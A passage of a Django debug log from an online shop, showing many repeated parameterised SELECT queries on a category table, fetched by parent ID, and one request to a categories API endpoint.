"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:42:05,772 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:42:05,778 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:42:05,782 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:42:05,786 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:42:05,791 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:42:05,795 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:42:05,799 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:42:05,805 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:42:05,809 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:42:05,814 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:42:05,818 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:42:05,822 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:42:05,828 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:42:05,831 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:42:05,835 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:42:05,839 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:42:05,843 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:42:05,847 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:42:05,849 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:42:05,852 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:42:05,854 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:42:05,856 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:42:05,858 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:42:05,861 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:42:05,863 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:42:05,866 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:42:05,868 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:42:05,871 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:42:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:42:53,344 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:42:53,350 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:42:53,354 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:42:53,356 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:42:53,359 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:42:53,361 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:42:53,364 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:42:53,366 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:42:53,369 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:42:53,372 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:42:53,374 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:42:53,376 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:42:53,379 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:42:53,381 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:42:53,384 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:42:53,386 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:42:53,389 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:42:53,391 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:42:53,393 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:42:53,397 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:42:53,400 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:42:53,402 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:42:53,404 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:42:53,407 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:42:53,409 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:42:53,412 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:42:53,415 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:42:53,417 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:42:53,419 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:42:53,422 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:42:53,425 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:42:53,427 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:42:53,430 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:42:53,432 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:42:53,434 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:42:53,438 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:42:53,441 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:42:53,443 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:42:53,445 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, 